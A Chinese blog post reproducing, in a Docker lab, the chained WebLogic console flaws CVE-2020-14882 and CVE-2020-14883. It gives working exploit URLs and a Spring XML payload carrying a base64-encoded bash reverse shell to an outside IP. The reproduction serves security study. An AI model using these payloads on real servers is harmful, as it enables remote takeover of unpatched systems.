Weblogic管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)

已于 2022-10-21 23:12:40 修改
阅读量632 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
于 2022-10-21 23:04:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhscxj/article/details/127442515
版权

启动环境

docker-compose up -d

 http://your-ip:7001/console访问登录页面

 此时我们不知道密码

CVE-2020-14882

首先测试权限绕过漏洞(CVE-2020-14882),访问以下URL,即可未授权访问到管理后台页面:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal

 burp抓包修改

 访问后台后,可以发现我们现在是低权限的用户,无法安装应用,所以也无法直接执行任意代码

CVE-2020-14883

此时需要利用到第二个漏洞CVE-2020-14883。这个漏洞的利用方式有两种,一是通过com.tangosol.coherence.mvel2.sh.ShellSession,二是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

直接访问如下URL,即可利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")

这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类。

com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext是一种更为通杀的方法,最早在CVE-2019-2725被提出,对于所有Weblogic版本均有效

首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如http://example.com/rce.xml

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTI5LzIwMjEgMD4x}|{base64,-d}|{bash,-i}]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

反弹shell

 搭建web服务将上面的恶意xml代码放到我们的公网服务器上

 

公网服务器处用nc监听本地shell端口

 然后通过如下URL,即可让Weblogic加载这个XML,并执行其中的命令:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")

 直接通过浏览器访问此url

此时目标服务器就会去访问公网地址的恶意xml并且执行

监听机获取到反弹的回话

深白色耳机
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-14883验证
weixin_39811856的博客
11-10 3354
[CVE-2020-14883] Oracle WebLogic Server认证的远程代码执行(RCE) 基于windows的受攻击对象:tangosol.coherence.mvel2.sh.ShellSession() POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1 Host: vulnerablehost:7001 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 ..
Weblogic CVE-2020-14882 授权远程命令执行漏洞
读书 买花 长大
02-25 595
CVE-2020-14882
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883
最新发布
weixin_45653478的博客
05-14 576
Weblogic Pre-Auth Remote Command Execution 漏洞CVE-2020-14882, CVE-2020-14883)是针对 Oracle WebLogic Server 的两个安全漏洞CVE-2020-14882 允许远程用户绕过管理控制台组件中的身份验证,而 CVE-2020-14883 则允许经过身份验证的用户在管理控制台组件上执行任意命令
CVE-2020-14882 weblogic授权远程命令执行漏洞
栉风沐雪的博客
02-22 4068
Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC 被公开,经身份验证)的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883漏洞复现
weixin_48413667的博客
09-22 8016
一、软件介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 二、漏洞描述 在2020年10月的更新中,Oracle官方修复了两个安全漏洞,分别是CVE-2020-14882CVE-2020-14883
CVE-2018-12613 --- 本地文件包含造成远程代码执行漏洞复现
wkend的博客
12-26 3253
0x01 了解本地文件包含 LFI(本地文件包含),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。 0x02 了解远程代码执行 RCE(远程代码执行),远程...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-2883:Weblogic coherence.jar RCE
04-13
CVE-2020-2883 先克隆框架 git clone https://github.com/Y4er/CVE-2020-2555 然后将 CVE_2020_2883.java 放到 src/com/supeream/CVE_2020_2883.java 目录下 导入idea运行 CVE_2020_2883.java RCE! 截图
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)
09-14
20180717官网发布Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)漏洞修复补丁
CVE-2020-14882/14883: Weblogic ConSole HTTP 协议代码执行漏洞通告
爱国小白帽
10-29 3606
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-102901 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-29 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞 相关 POC已经公开,该漏洞编号为 CVE-2020-14882,CVE-2020-14883漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HT
Weblogic Server RCE(CVE-2020-14882CVE-2020-14883)复现
weixin_42558965的博客
01-07 776
复现场景:docker、CentOS7、windows物理机 浮现过程: 使用vulhub-master配合docker搭建,进入weblogic/CVE-2020-14882文件夹下搭建环境: docker-compose up -d 成功搭建后在物理机上访问靶机IP+端口(默认7001),如下图所示: 访问靶机IP+端口(默认7001)/console如下图所示: 首先复现CVE-2020-14882绕过验证权限漏洞: 访问URL: http://靶机IP:7001/console/css/%25
weblogic RCE(CVE-2020-14882 CVE-2020-14883) 复现
SopRomeo的博客
03-10 710
影响版本 Weblogic : 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 vulhub 一键起即可 CVE-2020-14882 授权访问 http://10.219.64.141:7001/console/css/%252e%252e%252fconsole.portal 这个payload其实是经过了2次url编码 访问如下url即可越权访问后台 CVE-2020-14883 payload一: console/css/
[CVE-2020-14882/CVE-2020-14883]weblogioc http console认证绕过+任意代码执行
公众号shadow sock7
10-29 3357
参考: CVE-2020-14882 weblogic 授权命令执行复现 https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf Administrator@cqq MINGW64 /e/Oracle/Middleware12.2.1.3 $ grep -rn "com.tangosol.coherence.mvel2.sh.ShellSession"
weblogic权限绕过/远程命令执行漏洞复现(CVE-2020-14482、CVE-2020-14883
LuckySec
12-03 6855
0x01 漏洞简介 Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882CVE-2020-14883CVE-2020-14882远程攻击者可以构造特殊的HTTP请求,在经身份验证的情况下接管 WebLogic 管理控制台CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个HTTP请求
CVE-2020-14882~14883(Weblogic RCE)
include_heqile的博客
11-23 464
https://mp.weixin.qq.com/s?__biz=MzkzNTA0NzgyMA==&mid=2247483787&idx=1&sn=9406a10d2f78d20c1dc57b0cf98618db&chksm=c2b2a668f5c52f7e386c84f9e22379e7d4a3e7ee470e07427c4327555d98af7d7f5c103bf353&token=517092499&lang=zh_CN#rd
CVE-2020-14882 授权访问 CVE-2020-148823 RCE 含利用脚本
乌云__SS的博客
11-08 645
0x01漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882漏洞等级:严重 ,漏洞评分:9.8 。 远程攻击者可以构造特殊的 HTTP 请求,在经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 0x02影响版本 Oracle WeblogicServer ...
Weblogic IIOP反序列化漏洞(CVE-2020-2551)
07-28
嗨!关于Weblogic IIOP反序列化漏洞CVE-2020-2551),以下是一些相关信息: CVE-2020-2551是Weblogic Server的一个严重漏洞,该漏洞允许攻击者通过发送特制的T3协议请求来执行任意代码。这个漏洞属于Java反序列化漏洞的一种。 该漏洞的影响版本包括Weblogic Server 10.3.6.0.0、12.1.3.0.0和12.2.1.3.0。攻击者可以利用该漏洞远程执行任意代码,可能导致服务器的完全控制。 Oracle已经发布了安全补丁来修复这个漏洞。建议受影响的用户尽快升级到修复版本,并确保及时应用所有安全补丁。 此外,还可以通过配置防火墙规则、限制网络访问和监控异常行为等方法来增强系统的安全性。 希望这些信息能对你有所帮助!如果还有其他问题,请继续提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值